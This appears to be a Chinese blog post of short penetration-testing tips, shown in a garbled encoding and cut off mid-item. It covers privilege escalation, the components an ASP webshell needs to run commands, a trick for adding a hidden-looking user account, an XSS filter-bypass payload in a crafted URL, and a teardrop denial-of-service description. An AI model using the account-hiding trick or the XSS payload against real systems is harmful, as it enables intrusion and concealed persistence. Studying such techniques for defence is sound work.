滲透測(cè)試筆記主要為一些短小但又精華的滲透小技巧，旨在與小伙伴們分享學(xué)習(xí)心得。

1、提權(quán)簡(jiǎn)單歸納一下，可以分為系統(tǒng)設(shè)置與第三方軟件缺陷提權(quán)、溢出提權(quán)、社會(huì)工程學(xué)提權(quán)。

2、asp webshell想要執(zhí)行cmd命令，需要具備一起其中任一個(gè)組件：wscript.shell、wscript.shell1、shell applition、shell applition1

3、有時(shí)候添加賬號(hào)沒(méi)成功可能是服務(wù)器的強(qiáng)密碼策略(萬(wàn)惡的2008)，改個(gè)超強(qiáng)度的密碼再往死里整吧。

4、有時(shí)候能夠添加用戶，但是不能添加管理員組，這時(shí)候考慮是不是管理員組被改名了?？梢岳胣et user administrator查看管理員所屬的組來(lái)確定名稱。

5、添加賬號(hào)一個(gè)小小技巧，妙用無(wú)限：在添加賬號(hào)時(shí)，將賬號(hào)名設(shè)為“　”(引號(hào)里的字符為搜狗拼音打v+1時(shí)候的d項(xiàng))，不懂什么意思，net user一下你就知道這個(gè)淫蕩的技巧了。

7、XSS繞繞繞2：

search?str=xxxx%3Ca%20href=%22data:text/html;%26%230000000000000000098
ase64%26%230000000000000044%20PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg
==%22%3Etest%3C/a%3E 

缺陷參數(shù)：str

過(guò)濾規(guī)則夠BT 但是同樣能繞!

會(huì)把提交的編碼 給解碼 然后再插入到網(wǎng)頁(yè)中!然后再對(duì)網(wǎng)頁(yè)內(nèi)的值進(jìn)行檢查 過(guò)濾!

base64 --< %26%230000000000000000098ase64

首先%26%23會(huì)被還原成 &# 于是變成了： b 于是被還原成：b

b插入到頁(yè)面 再檢查 b+ase64 = base64 滿足規(guī)則 于是又過(guò)濾成 base64 繞過(guò)失敗!

但是如果b的html十進(jìn)制編碼 再多加幾個(gè)000 便不會(huì)被他給解碼 但是在瀏覽器中又會(huì)被解碼 于是便可以這樣繞過(guò)!

——摘自《XSS神器]XssEncode chrome插件 – 0x_Jin》

8、淚滴攻擊是拒絕服務(wù)攻擊的一種。 淚滴是一個(gè)特殊構(gòu)造的應(yīng)用程序，通過(guò)發(fā)送偽造的相互重疊的IP分組數(shù)據(jù)包，使其難以被接收主機(jī)重新組合。他們通常會(huì)導(dǎo)致目標(biāo)主機(jī)內(nèi)核失措 。 淚滴攻擊利用IP分組數(shù)據(jù)包重疊造成TCP/ IP分片重組代碼不能恰當(dāng)處理IP包。影響的系統(tǒng)有Windows 3.1、Windows 95和NT、2.0.32和2.1.63版本以下的Linux。

9、當(dāng)防火墻被放置在外網(wǎng)邊界，一般不會(huì)開(kāi)啟IDS功能，外網(wǎng)的攻擊比較多，也比較復(fù)雜，開(kāi)啟IDS可能導(dǎo)致防火墻的性能出現(xiàn)問(wèn)題。一般來(lái)說(shuō)，當(dāng)防火墻處于信息中心邊界時(shí)，可以開(kāi)啟IDS;而在外網(wǎng)邊界可以使用專門的IDS或IPS設(shè)備。

10、Nessus是一個(gè)強(qiáng)大的掃描器，強(qiáng)大到它甚至擁有屬于自己的腳本語(yǔ)言，稱為Attack Scripting Language(NASL)。

11、得到目標(biāo)站目錄， 不能直接跨的 。 可以通過(guò)” echo ^